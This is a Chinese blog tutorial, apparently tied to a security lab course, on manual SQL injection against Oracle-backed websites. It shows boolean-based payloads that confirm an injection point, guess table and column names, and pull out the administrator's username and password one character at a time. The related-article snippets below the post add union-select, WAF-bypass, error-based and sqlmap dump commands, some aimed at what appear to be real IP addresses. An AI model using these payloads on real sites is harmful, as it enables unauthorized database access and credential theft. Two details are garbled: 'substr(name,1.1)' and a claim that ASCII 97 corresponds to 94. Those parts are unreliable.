Oracle数据库手工注入

最新推荐文章于 2024-08-20 18:46:51 发布
最新推荐文章于 2024-08-20 18:46:51 发布
阅读量5.4k 收藏 4
点赞数 1
分类专栏: 合天网安实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/st415/article/details/78118382
版权

一、出现注入点的原因:程序员在编写代码时没有对用户输入的字符进行特殊处理。导致用户输入的特殊字符附带在参数中直接与数据库进行交互。

二、注入过程
1、打开一个连接地址:在网址后面加and 1=1 正常,and 1=2 错误。说明存在注入漏洞、

2、判断一下数据库中的表
and (select count(*) from admin)<>0返回正常。说明存在admin表。如果返回错误,可将admin改为username、manage等常用表名继续猜解、

3、判断一下该网站有几个管理员。
and (select count(*) from admin)=1 返回正常说明只有一个管理员

4、已知表的前提下,判断表中字段结构。
and (select count(name) from admin)>=0 返回正常,说明存在name字段
and (select count(pass) from admin)>=0 返回错误,说明不存在pass字段

5、采用ASCII码折半猜解管理员账号和密码:
判断管理员账号的长度:
and (select count(*) from admin where length(name)>=5)=1
//*length()函数用于求字符串长度,此处用来猜解用户名的长度和5做比较,猜测用户名是否由5个字符组成

判断管理员账号的值:
and (select count(*) from admin where ascii(substr(name,1.1))>=97)=1
//*substr()函数用于截取字符串,ascii()函数用于获取字符的ascii码、此处的意思是截取name字段的第一个字符,获取它的ascii码值,查询ascii码表可知94

相同方法猜解密码
and (select count(*) from admin where length(pwd)>=8)=1,返回正常,即密码长度为8,此时可以判断密码应该为明文
and (select count(*) from admin where ascii(substr(pwd,2,1))>=100)=1,返回正常,为字符d

  ......重复操作......

and (select count(*) from admin where ascii(substr(pwd,8,1))>=56)=1,返回正常,为数字8
and (select count(*) from admin where ascii(substr(pwd,1,1))>=97)=1,返回正常,为字符a
Stone_No1
关注
专栏目录
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2183
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
SQL手工注入漏洞测试(Oracle数据库)
weixin_52374319的博客
05-15 1115
SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn) 0x02 判断注入点 跟其他数据库一样,检测注入点都是可以通过拼接and语句进行判断。这里通过and 1=1 和and 1=2进行判断。实战中还可以通过延时函数进行判断。 http://124.70.71.251:44530/new_list.php?id=1%2
Oracle 数据库的简单手动注入
qq_42042353的博客
10-09 1000
日常判断注入点 and 1=1 and 1=2 爆破手段: 判断表 and (select count(*) from admin)&lt;&gt;0 返回正常,则有admin表,否则,无 判断列名 and (select count(列名) forom admin) &lt;&gt; 0 返回正常,则有该列名,否则,无 爆管理员账号密码: 先判断管理员账户字符长度 and (select cou...
Oracle手工注入
最新发布
2301_81525518的博客
08-20 383
这里写and 1=2页面不正常说明存在sql注入。首先还是老样子来判断它是否存在sql注入。然后再去网页找md5解密进行密码解密。这里3的时候页面不正常说明只有两列。查看除zhong和hu之外的数据。然后返回登录页面进行登录就完成了。再查看除了上边这个表之外别的表。
ORACLE数据库手工注入详解.doc
04-08
ORACLE数据库手工注入详解
【实战】Oracle注入总结
weixin_30784945的博客
01-08 296
小结: Union联合查询:  order by 定字段   and 1=2 union select null,null..... from dual 然后一个一个去判断字段类型,方法如下   and 1=2 union select 'null',null...... from dual 返回正常,说明第一个字段是字符型,反之为数字型     第一个字段是字符型,判断第二个字段类型:  ...
oracle手工注入执行命令,一次过狗oracle手工注入
weixin_39646084的博客
04-06 254
0x01.前言狗不是好狗,比较容易绕过,但也是第一次手工注入oracle,所以记录一下0x02.过程网站的url长这样:http://www.xxx.cn/xxx.php?zjid=1000经过简单的测试,过滤了空格以及union select通过fuzz,%0b没有过滤,union select可以通过简单的大小写转换绕过,怕是出现在ctf里的送分题。这样就简单了,简单改下sqlmap的tamp...
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1270
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解
Oracle爆错手工注入.doc
04-05
手工注入方式,利用报错注入 Oracle
记一次手工注入Oracle数据库
SoulCat
05-12 2795
记一次手工注入oracle数据库 枕头要常晒因为里面装满了发霉的梦想。 因为有点涉密直接过滤url,可以自行搭建靶机测试。 1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count (*) from dual)>0 Ps:Dual为oracle的一个默认表 3、判断列数order by 看页面是否正常显示 4、联合注...
Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
T1ngSh0w的博客
09-08 1609
Oracle数据库注入-墨者学院-SQL手工注入漏洞测试(Oracle数据库)详细讲解
oracle php 注入,Oracle手工注入小结
weixin_33595380的博客
03-26 290
前言:明日复明日,明日何其多。既然这么多,不妨再拖拖。Mysql和Mssql的注入环境都有了,手注也简单过了一遍,Oracle手注肯定也不能缺席鸭~环境搭建:Oracle相关操作(建立数据表):sqlplus / as sysdbacreate tablespace pentest datafile 'E:\app\tester_sws\oradata\orcl\pentest.dbf' size...
oracle手工注入执行命令,Oracle爆错手工注入 by:小冰
weixin_29306011的博客
04-06 292
目标:http://www.xxx.cc/view.asp?kind=NN4&bbsno=450×01判断数据库类型oracle 支持– 类型注释,但是不支持;分隔执行多语句,oracle有很多系统表,譬如user_tables,通过对这些表的访问也可以判断出是否属于oracle,另外在oracle里的一些函数也可以用来判断,譬如utl_http.request 这些,语言上的小细节也可以...
墨者学院SQL手工注入漏洞测试(Oracle数据库)--成功注入教程
qq1140037586的博客
06-21 804
墨者学院SQL手工注入漏洞测试(Oracle数据库)成功注入教程
oracle手工报错注入,注入
weixin_34515601的博客
04-10 484
Spring的常用注解2021-01-21 13:03:49① @Component:使用在普通java类上② @Service:使用在业务层类上作用:声明一个类的对象为bean对象,相当于配置了bean标签。注意:相当于使用的是无参数构造器来创建对象。问题:只使用@Service注解,和 A a=new A();的效果是相同的,创建的是一个没有初始化数据的bean对象,但是在sqlmap2021...
oracle手注,oracle手注
weixin_42512936的博客
04-10 195
报错注入:【1】爆版本号方法一:例子:http://210.35.35.70:82/Book.aspx?id=0199332841爆版本号:http://210.35.35.70:82/Book.aspx?id=0199332841' || utl_inaddr.get_host_name((select banner from v$version where rownum=1)) --报错信息:...
Oracle数据库手工注入技术详解
"ORACLE数据库手工注入详解" 本文主要探讨了如何进行ORACLE数据库手工注入攻击,通过一系列步骤来获取数据库的相关信息。首先,文章介绍了如何判断数据库类型,通过在URL参数后添加特定的SQL语句(如`and exist...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值